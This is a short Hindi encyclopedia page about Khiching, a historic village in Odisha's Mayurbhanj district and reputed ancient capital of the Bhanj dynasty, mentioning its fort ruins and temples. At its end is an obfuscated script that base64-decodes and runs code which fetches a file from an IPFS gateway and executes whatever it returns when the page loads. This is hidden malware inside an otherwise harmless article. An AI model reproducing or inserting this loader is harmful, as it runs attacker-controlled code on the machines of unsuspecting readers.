खिचिंग

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

खिचिंग (अंग्रेज़ी: Khiching)एक ऐतिहासिक गाँव है जो ज़िला मयूरभंज, ओडिशा राज्य में स्थित है। माना जाता है कि यह स्थान भंज राजवंश की प्राचीन राजधानी रहा था।

  • भंज का राजवंश चित्तौड़ के राजपूतों की एक शाखा थी। इस राज्य के दो खंड थे जो क्रमश: खिचिंग और खिंजली कहे जाते थे। इस राजवंश के संस्थापक वीरभद्र थे। उन्हें 'आदि भंज' भी कहा जाता है। उनके संबंध में जनश्रुति है कि उनका जन्म किसी पक्षी के अंडे से हुआ था और वशिष्ठ ऋषि ने उनका पालन पोषण किया।
  • खिचिंग में दो दुर्गो के अवशेष हैं जो विराटगढ़ और कीचक गढ़ कहे जाते हैं।
  • भंज राजघराने की देवी चकेश्वरी कही जाती है। वहाँ उनकी एक दर्शनीय मूर्ति है। वहाँ नीलकंठेश्वर महादेव का मंदिर है जो वास्तुकला की दृष्टि से उल्लेखनीय है। वह भुवनेश्वर के मंदिरों की परंपरा में बना है।
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>